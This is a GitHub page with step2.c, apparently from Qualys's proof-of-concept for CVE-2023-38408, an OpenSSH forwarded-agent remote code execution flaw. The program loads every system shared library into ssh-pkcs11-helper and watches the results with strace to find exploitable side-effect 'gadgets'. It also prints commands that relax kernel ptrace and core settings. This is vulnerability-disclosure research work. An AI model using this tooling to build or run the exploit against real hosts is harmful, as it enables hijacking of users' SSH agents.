-
Notifications
You must be signed in to change notification settings - Fork 2
/
step2.c
397 lines (368 loc) · 13 KB
/
step2.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
/*
* CVE-2023-38408: Remote Code Execution in OpenSSH's forwarded ssh-agent
* ./step2
* Copyright (C) 2023 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>.
*/
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <elf.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <link.h>
#include <signal.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/resource.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define die() do { \
fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
static int
is_shared_object(const char * const path)
{
ElfW(Ehdr) eh;
{
const int fd = open(path, O_RDONLY | O_NOFOLLOW);
if (fd <= -1) return 0;
const ssize_t nr = read(fd, &eh, sizeof(eh));
if (close(fd)) die();
if (nr != (ssize_t)sizeof(eh)) return 0;
}
if (eh.e_ident[EI_MAG0] != ELFMAG0 ||
eh.e_ident[EI_MAG1] != ELFMAG1 ||
eh.e_ident[EI_MAG2] != ELFMAG2 ||
eh.e_ident[EI_MAG3] != ELFMAG3 ||
eh.e_ident[EI_CLASS] != ELFCLASS64 ||
eh.e_ident[EI_DATA] != ELFDATA2LSB ||
eh.e_machine != EM_X86_64 ||
eh.e_type != ET_DYN)
return 0;
if (eh.e_version != EV_CURRENT) die();
if (eh.e_ehsize != sizeof(ElfW(Ehdr))) die();
if (eh.e_phentsize != sizeof(ElfW(Phdr))) die();
return 1;
}
static void
path_to_name(const char * const path, char * const name, const size_t size)
{
if (strchr(path, '!')) die();
size_t i;
for (i = 0; ; i++) {
if (i >= size) die();
name[i] = (path[i] != '/') ? path[i] : '!';
if (path[i] == '\0') break;
}
}
#define SSH_AGENT_FAILURE 5
#define SSH_AGENT_SUCCESS 6
#define SSH_AGENTC_ADD_SMARTCARD_KEY 20
#define SSH_AGENTC_REMOVE_SMARTCARD_KEY 21
static int
send_recv_msg(const int fd, const uint8_t type, const char * const path)
{
const size_t path_len = strlen(path);
if (path_len >= PATH_MAX) die();
uint8_t msg[PATH_MAX + 32];
uint8_t * cp = msg;
*(uint32_t *)cp = htonl(1 + 4 + path_len + 4 + 0);
cp += 4;
*cp++ = type;
*(uint32_t *)cp = htonl(path_len);
cp += 4;
memcpy(cp, path, path_len);
cp += path_len;
*(uint32_t *)cp = htonl(0);
cp += 4;
const size_t msg_len = cp - msg;
if (msg_len >= sizeof(msg)) die();
if (msg_len != 4 + 1 + 4 + path_len + 4 + 0) die();
if (send(fd, msg, msg_len, MSG_NOSIGNAL) != (ssize_t)msg_len) die();
if (fd <= -1) die();
if (fd >= FD_SETSIZE) die();
fd_set readfds;
FD_ZERO(&readfds);
FD_SET(fd, &readfds);
struct timeval timeout = { .tv_sec = 60 };
const int ready = select(fd + 1, &readfds, NULL, NULL, &timeout);
if (ready == 0) return -1;
if (ready != 1) die();
const ssize_t nr = recv(fd, msg, sizeof(msg), 0);
if (nr == 0) return -1;
if (nr <= 0) die();
switch (type) {
case SSH_AGENTC_ADD_SMARTCARD_KEY:
if (nr != 4 + 1 + 4 &&
nr != 4 + 1) return -1;
break;
case SSH_AGENTC_REMOVE_SMARTCARD_KEY:
if (nr != 4 + 1) die();
break;
default:
die();
}
if (ntohl(*(const uint32_t *)msg) != nr - 4) die();
if (msg[4] != SSH_AGENT_FAILURE) die();
return 0;
}
static void
cat_proc(const pid_t pid, const char * const in, const char * const out)
{
char buf[PATH_MAX];
if ((unsigned)snprintf(buf, sizeof(buf), "/proc/%ld/%s", (long)pid, in)
>= sizeof(buf)) die();
FILE * const in_fp = fopen(buf, "r");
FILE * const out_fp = fopen(out, "w");
if (!out_fp) die();
if (in_fp) {
while (fgets(buf, sizeof(buf), in_fp)) {
if (!strchr(buf, '\n')) die();
if (!strncmp(buf, "Vm", 2) ||
!strncmp(buf, "Rss", 3) ||
strstr(buf, "HugetlbPages:") ||
strstr(buf, "voluntary_ctxt_switches:") ||
strstr(buf, "State:") ||
strstr(buf, "[heap]\n"))
continue;
if (fputs(buf, out_fp) <= 0) die();
}
if (fclose(in_fp)) die();
}
if (fclose(out_fp)) die();
}
static int
diff_unlink(const char * const in1, const char * const in2, const char * const out)
{
const pid_t pid = fork();
if (pid <= -1) die();
if (pid == 0) {
const int fd = open(out, O_WRONLY | O_CREAT | O_EXCL, 0600);
if (fd <= STDERR_FILENO) die();
if (dup2(fd, STDIN_FILENO) != STDIN_FILENO) die();
if (dup2(fd, STDOUT_FILENO) != STDOUT_FILENO) die();
if (dup2(fd, STDERR_FILENO) != STDERR_FILENO) die();
if (close(fd)) die();
const char * const argv[] = { "/usr/bin/diff", "-u", in1, in2, NULL };
execve(*argv, (char * const *)argv, NULL);
die();
}
int status;
if (waitpid(pid, &status, 0) != pid) die();
if (!WIFEXITED(status)) die();
switch (WEXITSTATUS(status)) {
case 0:
if (unlink(out)) die();
/* fallthrough */
case 1:
if (unlink(in1)) die();
if (unlink(in2)) die();
break;
default:
die();
}
return WEXITSTATUS(status);
}
static int
grep_patterns(const char * const in, const char * const * patterns)
{
const int fd = open(in, O_RDONLY | O_NOFOLLOW);
if (fd <= -1) die();
struct stat sb;
if (fstat(fd, &sb)) die();
if (!S_ISREG(sb.st_mode)) die();
if (sb.st_size <= 0) die();
if (sb.st_size >= SSIZE_MAX) die();
const size_t size = sb.st_size;
const void * const addr = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
if (addr == MAP_FAILED) die();
if (close(fd)) die();
int match = 0;
for (;;) {
const char * const pat = *patterns++;
if (!pat) break;
if (memmem(addr, size, pat, strlen(pat))) {
match = 1;
break;
}
}
if (munmap((void *)addr, size)) die();
return match;
}
int
main(void)
{
{
const struct {
const char * file;
const char * value;
} proc[] = {
{ "/proc/sys/kernel/core_pattern", "\n" },
{ "/proc/sys/kernel/core_uses_pid", "0\n" },
{ "/proc/sys/kernel/yama/ptrace_scope", "0\n" },
};
size_t i;
for (i = 0; i < sizeof(proc) / sizeof(*proc); i++) {
const int fd = open(proc[i].file, O_RDONLY);
if (fd <= -1) die();
char buf[256];
const ssize_t nr = read(fd, buf, sizeof(buf));
if (close(fd)) die();
if (nr <= 0) die();
if ((size_t)nr >= sizeof(buf)) die();
if ((size_t)nr != strlen(proc[i].value) ||
memcmp(buf, proc[i].value, nr)) {
fprintf(stderr, "echo '%.*s' > %s\n", (int)strcspn(proc[i].value, "\n"), proc[i].value, proc[i].file);
die();
}
}
}
{
int signum;
for (signum = 1; signum < 100; signum++) {
if (signal(signum, SIG_DFL) != SIG_ERR) continue;
if (errno != EINVAL) die();
}
}
{
char base[] = "/tmp/step2.XXXXXX";
if (!mkdtemp(base)) die();
if (chdir(base)) die();
fprintf(stderr, "%s\n", base);
}
FILE * const find_fp = popen("find /usr/lib* /usr/local/lib* -type f 2>/dev/null", "re");
if (!find_fp) die();
unsigned objects = 0;
unsigned gadgets = 0;
char path[PATH_MAX + 1];
while (fgets(path, sizeof(path), find_fp)) {
char * const nl = strchr(path, '\n');
if (!nl) die();
*nl = '\0';
if (strncmp(path, "/usr/l", 6)) die();
if (!is_shared_object(path)) continue;
objects++;
if (!(objects % 1000)) fprintf(stderr, "objects %u ...\n", objects);
char name[NAME_MAX + 1];
path_to_name(path, name, sizeof(name));
if (mkdir(name, 0700)) die();
if (chdir(name)) die();
int pkcs_fds[2];
if (socketpair(AF_UNIX, SOCK_STREAM, 0, pkcs_fds)) die();
if (pkcs_fds[0] <= STDERR_FILENO) die();
if (pkcs_fds[1] <= STDERR_FILENO) die();
const pid_t pkcs_pid = fork();
if (pkcs_pid <= -1) die();
const int pkcs_fd = pkcs_fds[!pkcs_pid];
if (close(pkcs_fds[!!pkcs_pid])) die();
if (pkcs_pid == 0) {
if (dup2(pkcs_fd, STDIN_FILENO) != STDIN_FILENO) die();
if (dup2(pkcs_fd, STDOUT_FILENO) != STDOUT_FILENO) die();
if (close(pkcs_fd)) die();
const int stderr_fd = open("stderr", O_WRONLY | O_CREAT | O_EXCL, 0600);
if (stderr_fd <= STDERR_FILENO) die();
if (dup2(stderr_fd, STDERR_FILENO) != STDERR_FILENO) die();
if (close(stderr_fd)) die();
const char * const pkcs_helper = "/usr/lib/openssh/ssh-pkcs11-helper";
execlp(pkcs_helper, pkcs_helper, (const char *)NULL);
die();
}
if (send_recv_msg(pkcs_fd, SSH_AGENTC_REMOVE_SMARTCARD_KEY, "/")) die();
const pid_t strace_pid = fork();
if (strace_pid <= -1) die();
if (strace_pid == 0) {
if (close(pkcs_fd)) die();
const int null_fd = open("/dev/null", O_RDWR);
if (null_fd <= STDERR_FILENO) die();
if (dup2(null_fd, STDIN_FILENO) != STDIN_FILENO) die();
if (dup2(null_fd, STDOUT_FILENO) != STDOUT_FILENO) die();
if (dup2(null_fd, STDERR_FILENO) != STDERR_FILENO) die();
if (close(null_fd)) die();
char pkcs_pidstr[32];
if ((unsigned)snprintf(pkcs_pidstr, sizeof(pkcs_pidstr), "%ld", (long)pkcs_pid)
>= sizeof(pkcs_pidstr)) die();
const char * const strace_argv[] = { "/usr/bin/strace", "-f", "-s", "128", "-o", "strace", "-p", pkcs_pidstr, NULL };
execve(*strace_argv, (char * const *)strace_argv, NULL);
die();
}
struct stat sb;
for (;;) {
if (lstat("strace", &sb)) continue;
if (!S_ISREG(sb.st_mode)) die();
if (sb.st_size <= 0) continue;
break;
}
cat_proc(pkcs_pid, "status", "status1");
cat_proc(pkcs_pid, "maps", "maps1");
const int recv_error = send_recv_msg(pkcs_fd, SSH_AGENTC_ADD_SMARTCARD_KEY, path);
static const char * const background_patterns[] = { " clone(", " vfork(", " fork(", NULL };
if (grep_patterns("strace", background_patterns)) {
struct stat old_sb;
if (stat("strace", &old_sb)) die();
int z;
for (z = 0; z < 6; z++) {
sleep(10);
if (stat("strace", &sb)) die();
if (!memcmp(&old_sb, &sb, sizeof(sb))) break;
memcpy(&old_sb, &sb, sizeof(sb));
}
}
cat_proc(pkcs_pid, "status", "status2");
cat_proc(pkcs_pid, "maps", "maps2");
const int diff_status = diff_unlink("status1", "status2", "status");
const int diff_maps = diff_unlink("maps1", "maps2", "maps");
if (kill(pkcs_pid, SIGKILL)) die();
int pkcs_status;
if (waitpid(pkcs_pid, &pkcs_status, 0) != pkcs_pid) die();
if (close(pkcs_fd)) die();
if (lstat("stderr", &sb)) die();
if (!S_ISREG(sb.st_mode)) die();
const int stderr_bytes = sb.st_size > 0;
if (!stderr_bytes) {
if (unlink("stderr")) die();
}
if (waitpid(strace_pid, NULL, 0) != strace_pid) die();
static const char * const interesting_patterns[] = {
"RLIMIT_CPU", "RLIMIT_FSIZE", "RLIMIT_RTTIME",
"SIGABRT", "SIGALRM", "SIGBUS", "SIGCHLD", "SIGCONT", "SIGFPE", "SIGHUP", "SIGILL",
"SIGINT", "SIGIO", "SIGPIPE", "SIGPROF", "SIGPWR", "SIGQUIT", "SIGRT_1", "SIGSEGV",
"SIGSTKFLT", "SIGSYS", "SIGTERM", "SIGTRAP", "SIGTSTP", "SIGTTIN", "SIGTTOU", "SIGURG",
"SIGUSR1", "SIGUSR2", "SIGVTALRM", "SIGWINCH", "SIGXCPU", "SIGXFSZ",
"sigaltstack", "SA_ONSTACK", " clone(", " vfork(", " fork(", NULL };
const int grep_match = grep_patterns("strace", interesting_patterns);
if (!recv_error && !diff_status && !diff_maps && !stderr_bytes && !grep_match) {
if (unlink("strace")) die();
} else {
gadgets++;
}
if (chdir("..")) die();
(void) rmdir(name);
}
(void) pclose(find_fp);
fprintf(stderr, "objects %u\n", objects);
fprintf(stderr, "gadgets %u\n", gadgets);
exit(EXIT_SUCCESS);
}